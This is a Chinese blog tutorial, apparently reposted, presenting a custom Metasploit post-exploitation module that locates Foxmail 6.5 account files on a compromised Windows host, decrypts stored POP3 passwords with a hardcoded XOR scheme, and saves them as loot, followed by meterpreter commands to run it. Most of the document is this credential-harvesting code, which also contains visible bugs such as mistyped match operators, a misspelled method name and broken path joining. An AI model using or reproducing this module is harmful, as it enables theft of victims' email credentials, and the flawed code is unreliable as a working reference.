2. 程式人生 > >滲透之——Metasploit自定義收集登入憑證的後滲透模組

滲透之——Metasploit自定義收集登入憑證的後滲透模組

阿新 發佈:2019-01-14

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478

這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。

注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目標Windows系統的System許可權。

這裡,我們編寫指令碼foxmail_decrypt_by_binghe.rb,內容如下:

##
# Author 冰河
# Date 2019-01-13
# Description 對foxmail 6.5的登入憑證進行解密
#
# 實現過程如下:
# 1.搜尋使用者的檔案,查詢當前使用者的LocalAppData資料夾的準確位置
# 2.使用上面找到的文職,並將其與\VirtualStore\Program Files(x86)\Tencent\Foxmail\mail連線,建立一個mail資料夾的完整路徑
# 3.列出mail資料夾下的所有資料夾,並將它們都儲存到一個數組中。在mail資料夾中的每一個資料夾的名字都對應著一個郵箱使用者名稱,比如
 
[email protected]就可以是mail資料夾下的一個資料夾
# 4.在mail資料夾下的accounts檔案中查詢Account.stg檔案
# 5.通過讀取Account.stg檔案,會發現名為POP3Password的雜湊
# 6.將這個值傳遞給解密方法,然後就會得到明文密碼
# 7.將這些值儲存到資料庫
##

require 'msf/core'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles
  
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Foxmail 6.5 Credential Harvester',
      'Description'   => %q{
          This module Finds and Decrypts Stored Foxmail 6.5 Credentials
       },
       'License'      => MSF_LICENSE,
       'Author'       => ['binghe'],
       'Platform'     => ['Windows'],
       'SessionTypes' => ['Meterpreter']
    ))
    end
    
    #程式入口
    def run
      profile = grap_user_profiles()
      counter = 0
      data_entry = ""
      profile.each do |user|
        if user['LocalAppData']
          full_path = user['LocalAppData']
          full_path = full_path + "\\VirtualStore\\Program Files(x86)\\Tencent\\Foxmail\\mail"
          if directory?(full_path)
            print_good("Fox Mail Installed, Enumerating Mail Accounts")
            session.fs.dir.foreach(full_path) do |dir_list|
            if dir_list = ~/@/
              counter = counter + 1
              full_path_mail = full_path + "" + dir_list + "" + "Account.stg"
              if file?(full_path_mail)
                print_good("Reading Mail Account #{counter}")
                file_content = read_file(full_path_mail).split("\n")
                file_content.each do |hash|
                if hash = ~/POP3Password/
                  hash_data = hash.split("=")
                  hash_value = hash[1]
                  if hash_value.nil?
                    print_error("No Saved Password")
                  else
                    print_good("Decrypting Password for mail account: #{dir_list}")
                    #呼叫解密方法進行解密
                    decrypted_pass = decrypt(hash_value, dir_list)
                    data_entry << "Username:" + dir_list + "\t" + "Password:" + decrypted_pass + "\n"
                  end
                 end
                end
               end
              end
             end
            end
           end
          end
          store_loot("Foxmail Accounts", "text/plain", session, data_entry, "Fox.txt", "Fox Mail Accounts") 
      end  
      
      #解密方法
      def decrypt(hash_real, dir_list)
        decoded = ""
        magic = Array[126,100,114,97,71,111,110,126]
        fc0 = 90
        size = (hash_real.length) / 2 - 1
        index = 0
        b = Array.new(size)
        for i in 0 .. size do
         b[i] = (hash_real[index, 2]).hex
         index = index + 2
        end
        b[0] = b[0] ^ fc0
        double_magic = magic + magic
        d = Array.new(b.length - 1)
        for i in 1 .. b.length - 1 do
          d[i-1] = b[i] ^ double_magic[i - 1]
        end
        
        e = Array.new(d.length)
        for i in 0 .. (d.length -1)
          if(d[i] - b[i] < 0)
            e[i] = d[i] + 255 - b[i]
           else
            e[i] = d[i] - b[i]
           end
           decoded << e[i].chr
         end
         print_good("Found Username #{dir_list} with Password: #{decoded}")
         return decoded
       end
end

然後我們將foxmail_decrypt_by_binghe.rb指令碼上傳到Kali的/usr/share/metasploit-framework/modules/post/windows/gather/credentials目錄下。

在執行這個指令碼之前,我們先使用Metasploit中的msftidy工具檢查一下此指令碼的語法是否正確。

在Kali的命令列執行如下命令:

/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/post/windows/gather/credentials/foxmail_decrypt_by_binghe.rb

未輸出任何資訊,證明指令碼正確。

接下來,我們的Kali命令列,執行如下命令:

meterpreter > background
msf > set SESSION 1
msf > use post/windows/gather/credentials/foxmail_decrypt_by_binghe 
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > show options

Module options (post/windows/gather/credentials/foxmail_decrypt_by_binghe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > run

 

相關推薦

滲透——Metasploit定義收集登入憑證滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478 這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。 注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目

滲透——Metasploit定義讓磁碟失效的滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86383118 一個可以禁用Windows 作業系統上的指定硬碟的程式,這裡我們將指令碼命名為:disable_drives_by_binghe.rb。 具體內容如下:

滲透——Metasploit定義SSH認證暴力破解器

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86380258 這裡,我們首先編寫一個指令碼ssh_brute_by_binghe.rb,具體如下: ## # Author 冰河 # Date 2019-01-12 #

滲透——Metasploit定義FTP掃描模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86375375 這裡,我們編寫的Ruby指令碼ftp_version_by_binghe.rb如下: ## # Author 冰河 # Date 2019-01-12 #

SpringBoot系列使用定義註解校驗使用者是否登入

記得今年年初剛開始面試的時候,被問的最多的就是你知道Spring的兩大核心嘛?那你說說什麼是AOP,什麼是IOC?我相信你可能也被問了很多次了。 1、到底是什麼是AOP? 所謂AOP也就是面向切面程式設計,能夠讓我們在不影響原有業務功能的前提下,橫切擴充套件新的功能。這裡面有一個比較顯眼的詞

滲透——Metasploit-Meterpreter Shell資訊收集相關的命令

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下執行的。 一、程序遷移 1、獲取目標機正在執行的程序 ps 2

菜鳥學習shiro實現定義的Realm,從而實現登入驗證,身份驗證和許可權驗證4

講了那麼多使用的內建的類從而實現四郎,現在講自定義的境界 首先行家的依賴依然是第一篇的那個依賴 下邊是自定義的境界: import org.apache.shiro.authc.AuthenticationException; import org.apache.shi

JEPLUSAPP定義插件——JEPLUS軟件快速開發平臺

otto fff 使用 jid editor style img circle ckeditor JEPLUS之APP自定義插件 在JEPLUS中我們可以創建APP,但是創建的APP都是依賴於平臺功能在我們業務中有些需求並不是都要按照平臺

數據庫系列mysql 定義函數function,函數和存儲過程的區別

0.11 必須 def cte fec return語句 cit 新的 too mysql 自定義函數function,函數和存儲過程的區別 https://blog.csdn.net/u010365819/article/details/80470448 1.MySQL自

Log4Net 定義屬性記錄到文件中 (三)

hive days bsp 文本 處理 message homepage layout backup 即解決了將自定義屬性記錄到數據庫之後。一個新的想法冒了出來,自定義屬性同樣也能記錄到文件中嗎?答案是肯定的,因為Log4Net既然已經考慮到了數據庫記錄方式,當然也一定考慮

小程式學習旅----定義元件toast例項

components目錄下新建資料夾toast,新建component,之後修改toast.js和toast.wxml <!--components/toast/toast.wxml--> <view class='wx_toast_container' hidden="{{!

009-Ambari二次開發新增定義元件Redis(二)

上一篇我們主要介紹了Ambari新增元件的答題流程並以REDIS為例說明了流程,本篇在上一篇的基礎上,進一步完善說明流程並介紹如何給元件新增metric 掃描二維碼,關注BearData,獲取最新文章 上篇中,我們已經制作出了redis的rpm包,並重新編譯了我們修改後的Ambar

008-Ambari二次開發新增定義元件Redis(一)

Ambari目前支援的元件有HDFS、YARN、HBase、Hive、Pig、ZooKeeper、Sqoop、Storm、Flume、Tez、Oozie、Falcon、Storm、Altas、Knox、Spark、Ranger、Mahout、Kerberos等,已經涵蓋了從大資料應用的

車機開發新增定義

S700平臺即安卓5.1.1系統新增額外的自定義鍵值按鍵: 在Android的原生系統中鍵值預設情況下是92個,從0-91;一般情況下,這些鍵值是夠用的,但是如果想擴充的話,還是需要新增新的鍵值的;像我們做車機專案的,新增新按鍵鍵值太易見了,比如將倒車檢測做成新自定義鍵值按鍵,我們需要到多個

javawebEL定義函式

1.什麼是EL自定義函式 EL自定義函式是在EL表示式中呼叫的某個java類的靜態方法,這個靜態方法需在web應用程式中進行配置才可以被EL表示式呼叫。EL自定義函式可以擴充套件EL表示式的功能,讓EL表示式完成普通java程式程式碼所能完成的功能。 2.EL自定義函式開發步驟 編寫EL自定義函式

小程式填坑路--定義模態彈窗(已解決)

信我,這次只講技術! 實現效果(點選“更換手機號”,背景變暗,彈出輸入框): 嗯,我懶,就用了上一篇文章小程式填坑之路--彈窗修改手機號後的更新(已解決)的圖。 先上wxml的程式碼, <view class="weui-vcode-btn" bindtap="

一道面試題關於定義Json解析器

最近在群裡裡面有哥們說在面試的時候,要求上機寫一個簡單的Json解析器,看到這個題目的時候,心裡慌得一比,因為感覺有些力不從心,不知道從哪裡下手,所以趕緊查了一下Gson原始碼,看看有什麼啟示沒有。當然,這篇扯淡並不是介紹Gson原始碼,而是想自定義一個簡單的Json解析器,來熟悉一下J

並發編程學習筆記構建定義的同步工具(十一)

利用 追蹤 這不 temp sets nor rac lse 情況下 概述: 在並發編程學習筆記之並發工具類(四)中,為大家介紹了幾種同步工具(同步工具就是依靠自己的狀態,調節線程是阻塞還是運行用的.),閉鎖、FutureTask、信號量、關卡. 使用以上的同步工具大部分時

併發程式設計學習筆記構建定義的同步工具(十一)

概述: 在併發程式設計學習筆記之併發工具類(四)中,為大家介紹了幾種同步工具(同步工具就是依靠自己的狀態,調節執行緒是阻塞還是執行用的.),閉鎖、FutureTask、訊號量、關卡. 使用以上的同步工具大部分時候可以滿足我們的需求,但是如果沒能滿足我們需要的功能,可以使用語言和類庫提供的底層

MT5客戶端CTP接入 國內期貨定義交易品種 實時資料接收

實時接收資料大概分為2種方式 方式1:直接通過webrequest方式去請求, 例如 void OnStart() { string cookie=NULL,headers; char post[],result[]; string url="htt